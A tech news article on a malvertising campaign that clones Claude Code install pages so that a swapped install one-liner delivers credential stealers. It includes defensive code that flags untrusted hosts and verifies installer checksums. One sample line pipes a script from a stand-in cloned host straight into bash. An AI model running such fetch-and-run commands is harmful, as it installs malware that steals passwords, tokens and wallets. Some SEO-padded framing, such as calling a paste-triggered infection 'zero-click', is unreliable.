Security researchers at Bitdefender and Push Security have uncovered a campaign in which hackers used fake Google Ads to target developers, cloning Anthropic’s Claude Code pages and tricking users into deploying AI malware through InstallFix tactics.
The latest crop of attacks shows a worrying degree of precision in weaponizing AI for malware, moving away from common email phishing schemes and toward trusted search engines and developers’ installation practices.
Malware intelligence shows how attackers are now weaponizing AI for malware by turning trusted developer workflows against the users themselves.
Anatomy of the AI Malware Trap
The campaign centers on malicious SEO for AI: the use of paid Google Ads to push fake results to the top of search queries.
When a developer searches for “Claude Code install” or “Claude CLI,” they are served a sponsored link that looks identical to an official resource. It’s a classic example of how criminals are weaponizing AI for malware to gain a foothold on a system.
Once clicked, the user is taken to malicious clones of the official website. These sites are so convincing that even seasoned professionals might not notice the deception. While most links on the fake page redirect to legitimate Anthropic sites to maintain the illusion, the critical “install” command is switched.
This represents a new era of malicious AI tooling where the delivery method is as polished as the software it mimics.
Instead of a standard setup, the command triggers a hidden script.
“Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one,” researchers noted.
Once the initial command is pasted, the malware begins its work with no further user interaction, effectively acting as a zero-click spy tool. Malware intelligence shows that this InstallFix method exploits developers’ common habit of copying and pasting shell commands directly from the web.
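Because the swapped install one-liner differs from the legitimate one only in its embedded download host, a simple paste-time check can catch it. The sketch below is a minimal, hypothetical illustration of that idea: the allowlist contents and the cloned domain are assumptions for demonstration, not real indicators from the campaign.

```python
import re

# Hypothetical allowlist of vendor domains; a real deployment would
# maintain this per organization and source it from vendor documentation.
TRUSTED_DOMAINS = {"anthropic.com", "claude.ai", "npmjs.com"}

# Capture the host portion of any http(s) URL in a command string.
URL_RE = re.compile(r"https?://([^/\s\"']+)")

def flag_untrusted_urls(command: str) -> list[str]:
    """Return every URL host in a pasted command that is not on the allowlist."""
    suspicious = []
    for host in URL_RE.findall(command):
        # Strip optional userinfo and port before comparing.
        host = host.split("@")[-1].split(":")[0].lower()
        # Accept exact matches and subdomains of trusted domains.
        if not any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS):
            suspicious.append(host)
    return suspicious

# A cloned page typically swaps only the download host in the one-liner:
pasted = "curl -fsSL https://claude-install.example-clone.dev/install.sh | bash"
print(flag_untrusted_urls(pasted))  # → ['claude-install.example-clone.dev']
```

The same check could run in a clipboard monitor or a shell wrapper, flagging a pasted command before it ever executes.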
Stolen Credentials and System Risks
The payloads delivered in these attacks are often Amatera Stealer or ACR Stealer, both sold as malware-as-a-service. This is a clear case of weaponizing AI for malware to strip a machine of its most sensitive data.
Once executed, the software quietly harvests browser-stored passwords, session cookies, cryptocurrency wallets, and authentication tokens. Malware intelligence indicates that these tools are becoming increasingly automated.
For an organization, the risk is intensified because developer workstations are privileged endpoints. These machines often hold access to cloud infrastructure and source code repositories. Because of this, security teams are now advocating zero-trust for AI tools to ensure that no installer is trusted by default.
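One way to operationalize “no installer is trusted by default” is to refuse the curl-pipe-to-shell pattern entirely: download the script, verify its checksum against a value published out-of-band, and only then execute it. The sketch below illustrates that pattern; the URL and hash shown in the usage comment are placeholders, not real vendor endpoints.

```shell
#!/bin/sh
# Zero-trust install pattern: never pipe a downloaded script straight into a
# shell. Download it, verify its SHA-256 against a hash obtained out-of-band
# (e.g. signed release notes, not the same page that served the script),
# and only run it on a match.

verify_and_run() {
    file="$1"
    expected="$2"
    actual="$(sha256sum "$file" | awk '{print $1}')"
    if [ "$actual" = "$expected" ]; then
        sh "$file"
    else
        echo "checksum mismatch: refusing to run $file" >&2
        return 1
    fi
}

# Usage sketch (URL and hash are placeholders):
#   curl -fsSL "https://example.com/install.sh" -o /tmp/install.sh
#   verify_and_run /tmp/install.sh "<published-sha256>"
```

Even when a cloned page swaps the download URL, the fetched script’s hash will not match the published value, so the installer never runs.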
This is critical because hackers are now using AI code for malware, generating increasingly obfuscated scripts.
This trend highlights a growing vulnerability in how we adopt new technology. As teams rush to test the latest tools, the lack of malware intelligence can lead to disaster. Experts warn that malicious SEO for AI gives criminals fresh branding to exploit.
To stay safe, researchers suggest that AI-assisted malware detection may become necessary, but the best defense remains navigating directly to official vendor domains for all software downloads.
Inside Telecom provides you with an extensive list of content covering all aspects of the tech industry. Keep an eye on our Cybersecurity sections to stay informed and up-to-date with our daily articles.